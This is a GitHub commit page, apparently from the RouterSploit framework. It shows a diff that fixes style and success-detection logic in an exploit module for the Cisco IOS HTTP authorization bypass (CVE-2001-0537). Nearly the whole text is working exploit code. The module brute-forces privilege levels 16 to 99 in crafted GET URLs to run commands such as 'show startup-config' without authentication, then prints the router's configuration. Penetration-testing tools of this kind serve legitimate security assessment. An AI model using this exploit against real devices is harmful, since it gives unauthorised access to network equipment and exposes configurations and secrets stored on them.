Corrected logic errors

Corrected logic errors and PEP 8
enovella · Apr 18, 2017 · 66b8c45 · 66b8c45
1 parent a28aa3b
commit 66b8c45
Showing 1 changed file with 8 additions and 8 deletions.
diff --git a/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py b/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
                        'to bypass authentication and execute arbitrary commands, '
                        'when local authorization is being used, by specifying a high access level in the URL.',
         'authors': [
-            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  #routesploit module
+            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
         ],
         'references': [
             'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -34,8 +34,8 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  #target address
-    port = exploits.Option(80, 'Target port')  #default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
     show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
     access_level = None
 
@@ -44,7 +44,7 @@ def check(self):
         for num in range(16, 100):
             url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
             response = http_request(method="GET", url=url)
-            if response.status_code == 200:
+            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                 self.access_level = num
                 return True  # target is vulnerable
         return False  # target is not vulnerable
@@ -57,8 +57,8 @@ def run(self):
             if response is None:
                 print_error("Could not execute command")  # target is not vulnerable
                 return
-            elif response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
-                print_success("Exploit success! - executing command")
-                print re.sub('<[^<]+?>', '', response.text)
             else:
-                print_error("Exploit failed - target seems to be not vulnerable")
+                print_success("Exploit success! - executing command")
+                print_info(re.sub('<[^<]+?>', '', response.text))
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")